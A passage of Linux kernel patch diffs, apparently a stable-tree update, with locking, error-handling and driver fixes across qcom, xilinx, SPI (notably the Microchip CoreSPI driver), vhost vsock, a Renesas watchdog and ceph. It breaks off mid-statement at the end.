+ 	struct pdr_service *pds;
+ 
++	mutex_lock(&pdr->lock);
+ 	/* Create a local client port for QMI communication */
+ 	pdr->locator_addr.sq_family = AF_QIPCRTR;
+ 	pdr->locator_addr.sq_node = svc->node;
+ 	pdr->locator_addr.sq_port = svc->port;
+ 
+-	mutex_lock(&pdr->lock);
+ 	pdr->locator_init_complete = true;
+ 	mutex_unlock(&pdr->lock);
+ 
+@@ -104,10 +104,10 @@ static void pdr_locator_del_server(struct qmi_handle *qmi,
+ 
+ 	mutex_lock(&pdr->lock);
+ 	pdr->locator_init_complete = false;
+-	mutex_unlock(&pdr->lock);
+ 
+ 	pdr->locator_addr.sq_node = 0;
+ 	pdr->locator_addr.sq_port = 0;
++	mutex_unlock(&pdr->lock);
+ }
+ 
+ static const struct qmi_ops pdr_locator_ops = {
+@@ -365,12 +365,14 @@ static int pdr_get_domain_list(struct servreg_get_domain_list_req *req,
+ 	if (ret < 0)
+ 		return ret;
+ 
++	mutex_lock(&pdr->lock);
+ 	ret = qmi_send_request(&pdr->locator_hdl,
+ 			       &pdr->locator_addr,
+ 			       &txn, SERVREG_GET_DOMAIN_LIST_REQ,
+ 			       SERVREG_GET_DOMAIN_LIST_REQ_MAX_LEN,
+ 			       servreg_get_domain_list_req_ei,
+ 			       req);
++	mutex_unlock(&pdr->lock);
+ 	if (ret < 0) {
+ 		qmi_txn_cancel(&txn);
+ 		return ret;
+@@ -415,7 +417,7 @@ static int pdr_locate_service(struct pdr_handle *pdr, struct pdr_service *pds)
+ 		if (ret < 0)
+ 			goto out;
+ 
+-		for (i = domains_read; i < resp->domain_list_len; i++) {
++		for (i = 0; i < resp->domain_list_len; i++) {
+ 			entry = &resp->domain_list[i];
+ 
+ 			if (strnlen(entry->name, sizeof(entry->name)) == sizeof(entry->name))
+diff --git a/drivers/soc/qcom/rpmh-rsc.c b/drivers/soc/qcom/rpmh-rsc.c
+index 5e7bb6338707d..ff2b9eb9f669f 100644
+--- a/drivers/soc/qcom/rpmh-rsc.c
++++ b/drivers/soc/qcom/rpmh-rsc.c
+@@ -608,13 +608,14 @@ int rpmh_rsc_send_data(struct rsc_drv *drv, const struct tcs_request *msg)
+ {
+ 	struct tcs_group *tcs;
+ 	int tcs_id;
+-	unsigned long flags;
++
++	might_sleep();
+ 
+ 	tcs = get_tcs_for_msg(drv, msg);
+ 	if (IS_ERR(tcs))
+ 		return PTR_ERR(tcs);
+ 
+-	spin_lock_irqsave(&drv->lock, flags);
++	spin_lock_irq(&drv->lock);
+ 
+ 	/* Wait forever for a free tcs. It better be there eventually! */
+ 	wait_event_lock_irq(drv->tcs_wait,
+@@ -632,7 +633,7 @@ int rpmh_rsc_send_data(struct rsc_drv *drv, const struct tcs_request *msg)
+ 		write_tcs_reg_sync(drv, RSC_DRV_CMD_ENABLE, tcs_id, 0);
+ 		enable_tcs_irq(drv, tcs_id, true);
+ 	}
+-	spin_unlock_irqrestore(&drv->lock, flags);
++	spin_unlock_irq(&drv->lock);
+ 
+ 	/*
+ 	 * These two can be done after the lock is released because:
+diff --git a/drivers/soc/qcom/rpmh.c b/drivers/soc/qcom/rpmh.c
+index 01765ee9cdfb8..c6df7ac0afebc 100644
+--- a/drivers/soc/qcom/rpmh.c
++++ b/drivers/soc/qcom/rpmh.c
+@@ -189,7 +189,6 @@ static int __rpmh_write(const struct device *dev, enum rpmh_state state,
+ 	}
+ 
+ 	if (state == RPMH_ACTIVE_ONLY_STATE) {
+-		WARN_ON(irqs_disabled());
+ 		ret = rpmh_rsc_send_data(ctrlr_to_drv(ctrlr), &rpm_msg->msg);
+ 	} else {
+ 		/* Clean up our call by spoofing tx_done */
+diff --git a/drivers/soc/xilinx/xlnx_event_manager.c b/drivers/soc/xilinx/xlnx_event_manager.c
+index 8293cc40047fa..82e3174740238 100644
+--- a/drivers/soc/xilinx/xlnx_event_manager.c
++++ b/drivers/soc/xilinx/xlnx_event_manager.c
+@@ -3,6 +3,7 @@
+  * Xilinx Event Management Driver
+  *
+  *  Copyright (C) 2021 Xilinx, Inc.
++ *  Copyright (C) 2024 Advanced Micro Devices, Inc.
+  *
+  *  Abhyuday Godhasara <abhyuday.godhasara@xilinx.com>
+  */
+@@ -19,7 +20,7 @@
+ #include <linux/platform_device.h>
+ #include <linux/slab.h>
+ 
+-static DEFINE_PER_CPU_READ_MOSTLY(int, cpu_number1);
++static DEFINE_PER_CPU_READ_MOSTLY(int, dummy_cpu_number);
+ 
+ static int virq_sgi;
+ static int event_manager_availability = -EACCES;
+@@ -555,7 +556,6 @@ static void xlnx_disable_percpu_irq(void *data)
+ static int xlnx_event_init_sgi(struct platform_device *pdev)
+ {
+ 	int ret = 0;
+-	int cpu;
+ 	/*
+ 	 * IRQ related structures are used for the following:
+ 	 * for each SGI interrupt ensure its mapped by GIC IRQ domain
+@@ -592,11 +592,8 @@ static int xlnx_event_init_sgi(struct platform_device *pdev)
+ 	sgi_fwspec.param[0] = sgi_num;
+ 	virq_sgi = irq_create_fwspec_mapping(&sgi_fwspec);
+ 
+-	cpu = get_cpu();
+-	per_cpu(cpu_number1, cpu) = cpu;
+ 	ret = request_percpu_irq(virq_sgi, xlnx_event_handler, "xlnx_event_mgmt",
+-				 &cpu_number1);
+-	put_cpu();
++				 &dummy_cpu_number);
+ 
+ 	WARN_ON(ret);
+ 	if (ret) {
+@@ -612,16 +609,12 @@ static int xlnx_event_init_sgi(struct platform_device *pdev)
+ 
+ static void xlnx_event_cleanup_sgi(struct platform_device *pdev)
+ {
+-	int cpu = smp_processor_id();
+-
+-	per_cpu(cpu_number1, cpu) = cpu;
+-
+ 	cpuhp_remove_state(CPUHP_AP_ONLINE_DYN);
+ 
+ 	on_each_cpu(xlnx_disable_percpu_irq, NULL, 1);
+ 
+ 	irq_clear_status_flags(virq_sgi, IRQ_PER_CPU);
+-	free_percpu_irq(virq_sgi, &cpu_number1);
++	free_percpu_irq(virq_sgi, &dummy_cpu_number);
+ 	irq_dispose_mapping(virq_sgi);
+ }
+ 
+diff --git a/drivers/soc/xilinx/zynqmp_power.c b/drivers/soc/xilinx/zynqmp_power.c
+index 78a8a7545d1ed..5d41763414ad0 100644
+--- a/drivers/soc/xilinx/zynqmp_power.c
++++ b/drivers/soc/xilinx/zynqmp_power.c
+@@ -187,7 +187,9 @@ static int zynqmp_pm_probe(struct platform_device *pdev)
+ 	u32 pm_api_version;
+ 	struct mbox_client *client;
+ 
+-	zynqmp_pm_get_api_version(&pm_api_version);
++	ret = zynqmp_pm_get_api_version(&pm_api_version);
++	if (ret)
++		return ret;
+ 
+ 	/* Check PM API version number */
+ 	if (pm_api_version < ZYNQMP_PM_VERSION)
+diff --git a/drivers/spi/atmel-quadspi.c b/drivers/spi/atmel-quadspi.c
+index 7e05b48dbd71c..1f1aee28b1f79 100644
+--- a/drivers/spi/atmel-quadspi.c
++++ b/drivers/spi/atmel-quadspi.c
+@@ -724,8 +724,15 @@ static int __maybe_unused atmel_qspi_resume(struct device *dev)
+ 	struct atmel_qspi *aq = spi_controller_get_devdata(ctrl);
+ 	int ret;
+ 
+-	clk_prepare(aq->pclk);
+-	clk_prepare(aq->qspick);
++	ret = clk_prepare(aq->pclk);
++	if (ret)
++		return ret;
++
++	ret = clk_prepare(aq->qspick);
++	if (ret) {
++		clk_unprepare(aq->pclk);
++		return ret;
++	}
+ 
+ 	ret = pm_runtime_force_resume(dev);
+ 	if (ret < 0)
+diff --git a/drivers/spi/spi-microchip-core.c b/drivers/spi/spi-microchip-core.c
+index d352844c798c9..bfad0fe743ad7 100644
+--- a/drivers/spi/spi-microchip-core.c
++++ b/drivers/spi/spi-microchip-core.c
+@@ -21,7 +21,7 @@
+ #include <linux/spi/spi.h>
+ 
+ #define MAX_LEN				(0xffff)
+-#define MAX_CS				(8)
++#define MAX_CS				(1)
+ #define DEFAULT_FRAMESIZE		(8)
+ #define FIFO_DEPTH			(32)
+ #define CLK_GEN_MODE1_MAX		(255)
+@@ -75,6 +75,7 @@
+ 
+ #define REG_CONTROL		(0x00)
+ #define REG_FRAME_SIZE		(0x04)
++#define  FRAME_SIZE_MASK	GENMASK(5, 0)
+ #define REG_STATUS		(0x08)
+ #define REG_INT_CLEAR		(0x0c)
+ #define REG_RX_DATA		(0x10)
+@@ -89,6 +90,7 @@
+ #define REG_RIS			(0x24)
+ #define REG_CONTROL2		(0x28)
+ #define REG_COMMAND		(0x2c)
++#define  COMMAND_CLRFRAMECNT	BIT(4)
+ #define REG_PKTSIZE		(0x30)
+ #define REG_CMD_SIZE		(0x34)
+ #define REG_HWSTATUS		(0x38)
+@@ -157,62 +159,59 @@ static inline void mchp_corespi_read_fifo(struct mchp_corespi *spi)
+ 
+ static void mchp_corespi_enable_ints(struct mchp_corespi *spi)
+ {
+-	u32 control, mask = INT_ENABLE_MASK;
+-
+-	mchp_corespi_disable(spi);
+-
+-	control = mchp_corespi_read(spi, REG_CONTROL);
+-
+-	control |= mask;
+-	mchp_corespi_write(spi, REG_CONTROL, control);
++	u32 control = mchp_corespi_read(spi, REG_CONTROL);
+ 
+-	control |= CONTROL_ENABLE;
++	control |= INT_ENABLE_MASK;
+ 	mchp_corespi_write(spi, REG_CONTROL, control);
+ }
+ 
+ static void mchp_corespi_disable_ints(struct mchp_corespi *spi)
+ {
+-	u32 control, mask = INT_ENABLE_MASK;
+-
+-	mchp_corespi_disable(spi);
+-
+-	control = mchp_corespi_read(spi, REG_CONTROL);
+-	control &= ~mask;
+-	mchp_corespi_write(spi, REG_CONTROL, control);
++	u32 control = mchp_corespi_read(spi, REG_CONTROL);
+ 
+-	control |= CONTROL_ENABLE;
++	control &= ~INT_ENABLE_MASK;
+ 	mchp_corespi_write(spi, REG_CONTROL, control);
+ }
+ 
+ static inline void mchp_corespi_set_xfer_size(struct mchp_corespi *spi, int len)
+ {
+ 	u32 control;
+-	u16 lenpart;
++	u32 lenpart;
++	u32 frames = mchp_corespi_read(spi, REG_FRAMESUP);
+ 
+ 	/*
+-	 * Disable the SPI controller. Writes to transfer length have
+-	 * no effect when the controller is enabled.
++	 * Writing to FRAMECNT in REG_CONTROL will reset the frame count, so
++	 * taking a shortcut requires an explicit clear.
+ 	 */
+-	mchp_corespi_disable(spi);
++	if (frames == len) {
++		mchp_corespi_write(spi, REG_COMMAND, COMMAND_CLRFRAMECNT);
++		return;
++	}
+ 
+ 	/*
+ 	 * The lower 16 bits of the frame count are stored in the control reg
+ 	 * for legacy reasons, but the upper 16 written to a different register:
+ 	 * FRAMESUP. While both the upper and lower bits can be *READ* from the
+-	 * FRAMESUP register, writing to the lower 16 bits is a NOP
++	 * FRAMESUP register, writing to the lower 16 bits is (supposedly) a NOP.
++	 *
++	 * The driver used to disable the controller while modifying the frame
++	 * count, and mask off the lower 16 bits of len while writing to
++	 * FRAMES_UP. When the driver was changed to disable the controller as
++	 * infrequently as possible, it was discovered that the logic of
++	 * lenpart = len & 0xffff_0000
++	 * write(REG_FRAMESUP, lenpart)
++	 * would actually write zeros into the lower 16 bits on an mpfs250t-es,
++	 * despite documentation stating these bits were read-only.
++	 * Writing len unmasked into FRAMES_UP ensures those bits aren't zeroed
++	 * on an mpfs250t-es and will be a NOP for the lower 16 bits on hardware
++	 * that matches the documentation.
+ 	 */
+ 	lenpart = len & 0xffff;
+-
+ 	control = mchp_corespi_read(spi, REG_CONTROL);
+ 	control &= ~CONTROL_FRAMECNT_MASK;
+ 	control |= lenpart << CONTROL_FRAMECNT_SHIFT;
+ 	mchp_corespi_write(spi, REG_CONTROL, control);
+-
+-	lenpart = len & 0xffff0000;
+-	mchp_corespi_write(spi, REG_FRAMESUP, lenpart);
+-
+-	control |= CONTROL_ENABLE;
+-	mchp_corespi_write(spi, REG_CONTROL, control);
++	mchp_corespi_write(spi, REG_FRAMESUP, len);
+ }
+ 
+ static inline void mchp_corespi_write_fifo(struct mchp_corespi *spi)
+@@ -235,17 +234,22 @@ static inline void mchp_corespi_write_fifo(struct mchp_corespi *spi)
+ 
+ static inline void mchp_corespi_set_framesize(struct mchp_corespi *spi, int bt)
+ {
++	u32 frame_size = mchp_corespi_read(spi, REG_FRAME_SIZE);
+ 	u32 control;
+ 
++	if ((frame_size & FRAME_SIZE_MASK) == bt)
++		return;
++
+ 	/*
+ 	 * Disable the SPI controller. Writes to the frame size have
+ 	 * no effect when the controller is enabled.
+ 	 */
+-	mchp_corespi_disable(spi);
++	control = mchp_corespi_read(spi, REG_CONTROL);
++	control &= ~CONTROL_ENABLE;
++	mchp_corespi_write(spi, REG_CONTROL, control);
+ 
+ 	mchp_corespi_write(spi, REG_FRAME_SIZE, bt);
+ 
+-	control = mchp_corespi_read(spi, REG_CONTROL);
+ 	control |= CONTROL_ENABLE;
+ 	mchp_corespi_write(spi, REG_CONTROL, control);
+ }
+@@ -253,7 +257,7 @@ static inline void mchp_corespi_set_framesize(struct mchp_corespi *spi, int bt)
+ static void mchp_corespi_set_cs(struct spi_device *spi, bool disable)
+ {
+ 	u32 reg;
+-	struct mchp_corespi *corespi = spi_master_get_devdata(spi->master);
++	struct mchp_corespi *corespi = spi_controller_get_devdata(spi->controller);
+ 
+ 	reg = mchp_corespi_read(corespi, REG_SLAVE_SELECT);
+ 	reg &= ~BIT(spi->chip_select);
+@@ -264,11 +268,11 @@ static void mchp_corespi_set_cs(struct spi_device *spi, bool disable)
+ 
+ static int mchp_corespi_setup(struct spi_device *spi)
+ {
+-	struct mchp_corespi *corespi = spi_master_get_devdata(spi->master);
++	struct mchp_corespi *corespi = spi_controller_get_devdata(spi->controller);
+ 	u32 reg;
+ 
+ 	/*
+-	 * Active high slaves need to be specifically set to their inactive
++	 * Active high targets need to be specifically set to their inactive
+ 	 * states during probe by adding them to the "control group" & thus
+ 	 * driving their select line low.
+ 	 */
+@@ -280,22 +284,18 @@ static int mchp_corespi_setup(struct spi_device *spi)
+ 	return 0;
+ }
+ 
+-static void mchp_corespi_init(struct spi_master *master, struct mchp_corespi *spi)
++static void mchp_corespi_init(struct spi_controller *host, struct mchp_corespi *spi)
+ {
+ 	unsigned long clk_hz;
+ 	u32 control = mchp_corespi_read(spi, REG_CONTROL);
+ 
+-	control |= CONTROL_MASTER;
++	control &= ~CONTROL_ENABLE;
++	mchp_corespi_write(spi, REG_CONTROL, control);
+ 
++	control |= CONTROL_MASTER;
+ 	control &= ~CONTROL_MODE_MASK;
+ 	control |= MOTOROLA_MODE;
+ 
+-	mchp_corespi_set_framesize(spi, DEFAULT_FRAMESIZE);
+-
+-	/* max. possible spi clock rate is the apb clock rate */
+-	clk_hz = clk_get_rate(spi->clk);
+-	master->max_speed_hz = clk_hz;
+-
+ 	/*
+ 	 * The controller must be configured so that it doesn't remove Chip
+ 	 * Select until the entire message has been transferred, even if at
+@@ -304,17 +304,22 @@ static void mchp_corespi_init(struct spi_master *master, struct mchp_corespi *sp
+ 	 * BIGFIFO mode is also enabled, which sets the fifo depth to 32 frames
+ 	 * for the 8 bit transfers that this driver uses.
+ 	 */
+-	control = mchp_corespi_read(spi, REG_CONTROL);
+ 	control |= CONTROL_SPS | CONTROL_BIGFIFO;
+ 
+ 	mchp_corespi_write(spi, REG_CONTROL, control);
+ 
++	mchp_corespi_set_framesize(spi, DEFAULT_FRAMESIZE);
++
++	/* max. possible spi clock rate is the apb clock rate */
++	clk_hz = clk_get_rate(spi->clk);
++	host->max_speed_hz = clk_hz;
++
+ 	mchp_corespi_enable_ints(spi);
+ 
+ 	/*
+ 	 * It is required to enable direct mode, otherwise control over the chip
+ 	 * select is relinquished to the hardware. SSELOUT is enabled too so we
+-	 * can deal with active high slaves.
++	 * can deal with active high targets.
+ 	 */
+ 	mchp_corespi_write(spi, REG_SLAVE_SELECT, SSELOUT | SSEL_DIRECT);
+ 
+@@ -330,8 +335,6 @@ static inline void mchp_corespi_set_clk_gen(struct mchp_corespi *spi)
+ {
+ 	u32 control;
+ 
+-	mchp_corespi_disable(spi);
+-
+ 	control = mchp_corespi_read(spi, REG_CONTROL);
+ 	if (spi->clk_mode)
+ 		control |= CONTROL_CLKMODE;
+@@ -340,12 +343,12 @@ static inline void mchp_corespi_set_clk_gen(struct mchp_corespi *spi)
+ 
+ 	mchp_corespi_write(spi, REG_CLK_GEN, spi->clk_gen);
+ 	mchp_corespi_write(spi, REG_CONTROL, control);
+-	mchp_corespi_write(spi, REG_CONTROL, control | CONTROL_ENABLE);
+ }
+ 
+ static inline void mchp_corespi_set_mode(struct mchp_corespi *spi, unsigned int mode)
+ {
+-	u32 control, mode_val;
++	u32 mode_val;
++	u32 control = mchp_corespi_read(spi, REG_CONTROL);
+ 
+ 	switch (mode & SPI_MODE_X_MASK) {
+ 	case SPI_MODE_0:
+@@ -363,12 +366,13 @@ static inline void mchp_corespi_set_mode(struct mchp_corespi *spi, unsigned int
+ 	}
+ 
+ 	/*
+-	 * Disable the SPI controller. Writes to the frame size have
++	 * Disable the SPI controller. Writes to the frame protocol have
+ 	 * no effect when the controller is enabled.
+ 	 */
+-	mchp_corespi_disable(spi);
+ 
+-	control = mchp_corespi_read(spi, REG_CONTROL);
++	control &= ~CONTROL_ENABLE;
++	mchp_corespi_write(spi, REG_CONTROL, control);
++
+ 	control &= ~(SPI_MODE_X_MASK << MODE_X_MASK_SHIFT);
+ 	control |= mode_val;
+ 
+@@ -380,8 +384,8 @@ static inline void mchp_corespi_set_mode(struct mchp_corespi *spi, unsigned int
+ 
+ static irqreturn_t mchp_corespi_interrupt(int irq, void *dev_id)
+ {
+-	struct spi_master *master = dev_id;
+-	struct mchp_corespi *spi = spi_master_get_devdata(master);
++	struct spi_controller *host = dev_id;
++	struct mchp_corespi *spi = spi_controller_get_devdata(host);
+ 	u32 intfield = mchp_corespi_read(spi, REG_MIS) & 0xf;
+ 	bool finalise = false;
+ 
+@@ -389,26 +393,23 @@ static irqreturn_t mchp_corespi_interrupt(int irq, void *dev_id)
+ 	if (intfield == 0)
+ 		return IRQ_NONE;
+ 
+-	if (intfield & INT_TXDONE) {
++	if (intfield & INT_TXDONE)
+ 		mchp_corespi_write(spi, REG_INT_CLEAR, INT_TXDONE);
+ 
++	if (intfield & INT_RXRDY) {
++		mchp_corespi_write(spi, REG_INT_CLEAR, INT_RXRDY);
++
+ 		if (spi->rx_len)
+ 			mchp_corespi_read_fifo(spi);
+-
+-		if (spi->tx_len)
+-			mchp_corespi_write_fifo(spi);
+-
+-		if (!spi->rx_len)
+-			finalise = true;
+ 	}
+ 
+-	if (intfield & INT_RXRDY)
+-		mchp_corespi_write(spi, REG_INT_CLEAR, INT_RXRDY);
++	if (!spi->rx_len && !spi->tx_len)
++		finalise = true;
+ 
+ 	if (intfield & INT_RX_CHANNEL_OVERFLOW) {
+ 		mchp_corespi_write(spi, REG_INT_CLEAR, INT_RX_CHANNEL_OVERFLOW);
+ 		finalise = true;
+-		dev_err(&master->dev,
++		dev_err(&host->dev,
+ 			"%s: RX OVERFLOW: rxlen: %d, txlen: %d\n", __func__,
+ 			spi->rx_len, spi->tx_len);
+ 	}
+@@ -416,13 +417,13 @@ static irqreturn_t mchp_corespi_interrupt(int irq, void *dev_id)
+ 	if (intfield & INT_TX_CHANNEL_UNDERRUN) {
+ 		mchp_corespi_write(spi, REG_INT_CLEAR, INT_TX_CHANNEL_UNDERRUN);
+ 		finalise = true;
+-		dev_err(&master->dev,
++		dev_err(&host->dev,
+ 			"%s: TX UNDERFLOW: rxlen: %d, txlen: %d\n", __func__,
+ 			spi->rx_len, spi->tx_len);
+ 	}
+ 
+ 	if (finalise)
+-		spi_finalize_current_transfer(master);
++		spi_finalize_current_transfer(host);
+ 
+ 	return IRQ_HANDLED;
+ }
+@@ -464,16 +465,16 @@ static int mchp_corespi_calculate_clkgen(struct mchp_corespi *spi,
+ 	return 0;
+ }
+ 
+-static int mchp_corespi_transfer_one(struct spi_master *master,
++static int mchp_corespi_transfer_one(struct spi_controller *host,
+ 				     struct spi_device *spi_dev,
+ 				     struct spi_transfer *xfer)
+ {
+-	struct mchp_corespi *spi = spi_master_get_devdata(master);
++	struct mchp_corespi *spi = spi_controller_get_devdata(host);
+ 	int ret;
+ 
+ 	ret = mchp_corespi_calculate_clkgen(spi, (unsigned long)xfer->speed_hz);
+ 	if (ret) {
+-		dev_err(&master->dev, "failed to set clk_gen for target %u Hz\n", xfer->speed_hz);
++		dev_err(&host->dev, "failed to set clk_gen for target %u Hz\n", xfer->speed_hz);
+ 		return ret;
+ 	}
+ 
+@@ -488,16 +489,17 @@ static int mchp_corespi_transfer_one(struct spi_master *master,
+ 	mchp_corespi_set_xfer_size(spi, (spi->tx_len > FIFO_DEPTH)
+ 				   ? FIFO_DEPTH : spi->tx_len);
+ 
+-	if (spi->tx_len)
++	while (spi->tx_len)
+ 		mchp_corespi_write_fifo(spi);
++
+ 	return 1;
+ }
+ 
+-static int mchp_corespi_prepare_message(struct spi_master *master,
++static int mchp_corespi_prepare_message(struct spi_controller *host,
+ 					struct spi_message *msg)
+ {
+ 	struct spi_device *spi_dev = msg->spi;
+-	struct mchp_corespi *spi = spi_master_get_devdata(master);
++	struct mchp_corespi *spi = spi_controller_get_devdata(host);
+ 
+ 	mchp_corespi_set_framesize(spi, DEFAULT_FRAMESIZE);
+ 	mchp_corespi_set_mode(spi, spi_dev->mode);
+@@ -507,32 +509,32 @@ static int mchp_corespi_prepare_message(struct spi_master *master,
+ 
+ static int mchp_corespi_probe(struct platform_device *pdev)
+ {
+-	struct spi_master *master;
++	struct spi_controller *host;
+ 	struct mchp_corespi *spi;
+ 	struct resource *res;
+ 	u32 num_cs;
+ 	int ret = 0;
+ 
+-	master = devm_spi_alloc_master(&pdev->dev, sizeof(*spi));
+-	if (!master)
++	host = devm_spi_alloc_host(&pdev->dev, sizeof(*spi));
++	if (!host)
+ 		return dev_err_probe(&pdev->dev, -ENOMEM,
+-				     "unable to allocate master for SPI controller\n");
++				     "unable to allocate host for SPI controller\n");
+ 
+-	platform_set_drvdata(pdev, master);
++	platform_set_drvdata(pdev, host);
+ 
+ 	if (of_property_read_u32(pdev->dev.of_node, "num-cs", &num_cs))
+ 		num_cs = MAX_CS;
+ 
+-	master->num_chipselect = num_cs;
+-	master->mode_bits = SPI_CPOL | SPI_CPHA | SPI_CS_HIGH;
+-	master->setup = mchp_corespi_setup;
+-	master->bits_per_word_mask = SPI_BPW_MASK(8);
+-	master->transfer_one = mchp_corespi_transfer_one;
+-	master->prepare_message = mchp_corespi_prepare_message;
+-	master->set_cs = mchp_corespi_set_cs;
+-	master->dev.of_node = pdev->dev.of_node;
++	host->num_chipselect = num_cs;
++	host->mode_bits = SPI_CPOL | SPI_CPHA | SPI_CS_HIGH;
++	host->setup = mchp_corespi_setup;
++	host->bits_per_word_mask = SPI_BPW_MASK(8);
++	host->transfer_one = mchp_corespi_transfer_one;
++	host->prepare_message = mchp_corespi_prepare_message;
++	host->set_cs = mchp_corespi_set_cs;
++	host->dev.of_node = pdev->dev.of_node;
+ 
+-	spi = spi_master_get_devdata(master);
++	spi = spi_controller_get_devdata(host);
+ 
+ 	spi->regs = devm_platform_get_and_ioremap_resource(pdev, 0, &res);
+ 	if (IS_ERR(spi->regs))
+@@ -545,7 +547,7 @@ static int mchp_corespi_probe(struct platform_device *pdev)
+ 				     spi->irq);
+ 
+ 	ret = devm_request_irq(&pdev->dev, spi->irq, mchp_corespi_interrupt,
+-			       IRQF_SHARED, dev_name(&pdev->dev), master);
++			       IRQF_SHARED, dev_name(&pdev->dev), host);
+ 	if (ret)
+ 		return dev_err_probe(&pdev->dev, ret,
+ 				     "could not request irq\n");
+@@ -560,25 +562,25 @@ static int mchp_corespi_probe(struct platform_device *pdev)
+ 		return dev_err_probe(&pdev->dev, ret,
+ 				     "failed to enable clock\n");
+ 
+-	mchp_corespi_init(master, spi);
++	mchp_corespi_init(host, spi);
+ 
+-	ret = devm_spi_register_master(&pdev->dev, master);
++	ret = devm_spi_register_controller(&pdev->dev, host);
+ 	if (ret) {
+ 		mchp_corespi_disable(spi);
+ 		clk_disable_unprepare(spi->clk);
+ 		return dev_err_probe(&pdev->dev, ret,
+-				     "unable to register master for SPI controller\n");
++				     "unable to register host for SPI controller\n");
+ 	}
+ 
+-	dev_info(&pdev->dev, "Registered SPI controller %d\n", master->bus_num);
++	dev_info(&pdev->dev, "Registered SPI controller %d\n", host->bus_num);
+ 
+ 	return 0;
+ }
+ 
+ static int mchp_corespi_remove(struct platform_device *pdev)
+ {
+-	struct spi_master *master  = platform_get_drvdata(pdev);
+-	struct mchp_corespi *spi = spi_master_get_devdata(master);
++	struct spi_controller *host  = platform_get_drvdata(pdev);
++	struct mchp_corespi *spi = spi_controller_get_devdata(host);
+ 
+ 	mchp_corespi_disable_ints(spi);
+ 	clk_disable_unprepare(spi->clk);
+diff --git a/drivers/spi/spidev.c b/drivers/spi/spidev.c
+index 71c3db60e9687..00612efc2277f 100644
+--- a/drivers/spi/spidev.c
++++ b/drivers/spi/spidev.c
+@@ -700,6 +700,7 @@ static const struct spi_device_id spidev_spi_ids[] = {
+ 	{ .name = "m53cpld" },
+ 	{ .name = "spi-petra" },
+ 	{ .name = "spi-authenta" },
++	{ .name = "em3581" },
+ 	{},
+ };
+ MODULE_DEVICE_TABLE(spi, spidev_spi_ids);
+@@ -718,14 +719,16 @@ static int spidev_of_check(struct device *dev)
+ }
+ 
+ static const struct of_device_id spidev_dt_ids[] = {
+-	{ .compatible = "rohm,dh2228fv", .data = &spidev_of_check },
++	{ .compatible = "cisco,spi-petra", .data = &spidev_of_check },
++	{ .compatible = "dh,dhcom-board", .data = &spidev_of_check },
+ 	{ .compatible = "lineartechnology,ltc2488", .data = &spidev_of_check },
+-	{ .compatible = "semtech,sx1301", .data = &spidev_of_check },
+ 	{ .compatible = "lwn,bk4", .data = &spidev_of_check },
+-	{ .compatible = "dh,dhcom-board", .data = &spidev_of_check },
+ 	{ .compatible = "menlo,m53cpld", .data = &spidev_of_check },
+-	{ .compatible = "cisco,spi-petra", .data = &spidev_of_check },
+ 	{ .compatible = "micron,spi-authenta", .data = &spidev_of_check },
++	{ .compatible = "rohm,bh2228fv", .data = &spidev_of_check },
++	{ .compatible = "rohm,dh2228fv", .data = &spidev_of_check },
++	{ .compatible = "semtech,sx1301", .data = &spidev_of_check },
++	{ .compatible = "silabs,em3581", .data = &spidev_of_check },
+ 	{},
+ };
+ MODULE_DEVICE_TABLE(of, spidev_dt_ids);
+diff --git a/drivers/vhost/vsock.c b/drivers/vhost/vsock.c
+index 1f3b89c885cca..c00f5821d6ecb 100644
+--- a/drivers/vhost/vsock.c
++++ b/drivers/vhost/vsock.c
+@@ -654,6 +654,7 @@ static int vhost_vsock_dev_open(struct inode *inode, struct file *file)
+ 	}
+ 
+ 	vsock->guest_cid = 0; /* no CID assigned yet */
++	vsock->seqpacket_allow = false;
+ 
+ 	atomic_set(&vsock->queued_replies, 0);
+ 
+@@ -797,8 +798,7 @@ static int vhost_vsock_set_features(struct vhost_vsock *vsock, u64 features)
+ 			goto err;
+ 	}
+ 
+-	if (features & (1ULL << VIRTIO_VSOCK_F_SEQPACKET))
+-		vsock->seqpacket_allow = true;
++	vsock->seqpacket_allow = features & (1ULL << VIRTIO_VSOCK_F_SEQPACKET);
+ 
+ 	for (i = 0; i < ARRAY_SIZE(vsock->vqs); i++) {
+ 		vq = &vsock->vqs[i];
+diff --git a/drivers/watchdog/rzg2l_wdt.c b/drivers/watchdog/rzg2l_wdt.c
+index d404953d0e0f4..9b2698a4fc1a1 100644
+--- a/drivers/watchdog/rzg2l_wdt.c
++++ b/drivers/watchdog/rzg2l_wdt.c
+@@ -123,8 +123,11 @@ static void rzg2l_wdt_init_timeout(struct watchdog_device *wdev)
+ static int rzg2l_wdt_start(struct watchdog_device *wdev)
+ {
+ 	struct rzg2l_wdt_priv *priv = watchdog_get_drvdata(wdev);
++	int ret;
+ 
+-	pm_runtime_get_sync(wdev->parent);
++	ret = pm_runtime_resume_and_get(wdev->parent);
++	if (ret)
++		return ret;
+ 
+ 	/* Initialize time out */
+ 	rzg2l_wdt_init_timeout(wdev);
+@@ -141,15 +144,21 @@ static int rzg2l_wdt_start(struct watchdog_device *wdev)
+ static int rzg2l_wdt_stop(struct watchdog_device *wdev)
+ {
+ 	struct rzg2l_wdt_priv *priv = watchdog_get_drvdata(wdev);
++	int ret;
+ 
+ 	rzg2l_wdt_reset(priv);
+-	pm_runtime_put(wdev->parent);
++
++	ret = pm_runtime_put(wdev->parent);
++	if (ret < 0)
++		return ret;
+ 
+ 	return 0;
+ }
+ 
+ static int rzg2l_wdt_set_timeout(struct watchdog_device *wdev, unsigned int timeout)
+ {
++	int ret = 0;
++
+ 	wdev->timeout = timeout;
+ 
+ 	/*
+@@ -158,11 +167,14 @@ static int rzg2l_wdt_set_timeout(struct watchdog_device *wdev, unsigned int time
+ 	 * to reset the module) so that it is updated with new timeout values.
+ 	 */
+ 	if (watchdog_active(wdev)) {
+-		rzg2l_wdt_stop(wdev);
+-		rzg2l_wdt_start(wdev);
++		ret = rzg2l_wdt_stop(wdev);
++		if (ret)
++			return ret;
++
++		ret = rzg2l_wdt_start(wdev);
+ 	}
+ 
+-	return 0;
++	return ret;
+ }
+ 
+ static int rzg2l_wdt_restart(struct watchdog_device *wdev,
+diff --git a/fs/ceph/super.c b/fs/ceph/super.c
+index 281b493fdac8e..aa75aa796e434 100644
+--- a/fs/ceph/super.c
++++ b/fs/ceph/super.c
+@@ -924,7 +924,8 @@ static int __init init_caches(void)
+ 	if (!ceph_mds_request_cachep)
+ 		goto bad_mds_req;
+ 
+-	ceph_wb_pagevec_pool = mempool_create_kmalloc_pool(10, CEPH_MAX_WRITE_SIZE >> PAGE_SHIFT);
++	ceph_wb_pagevec_pool = mempool_create_kmalloc_pool(10,
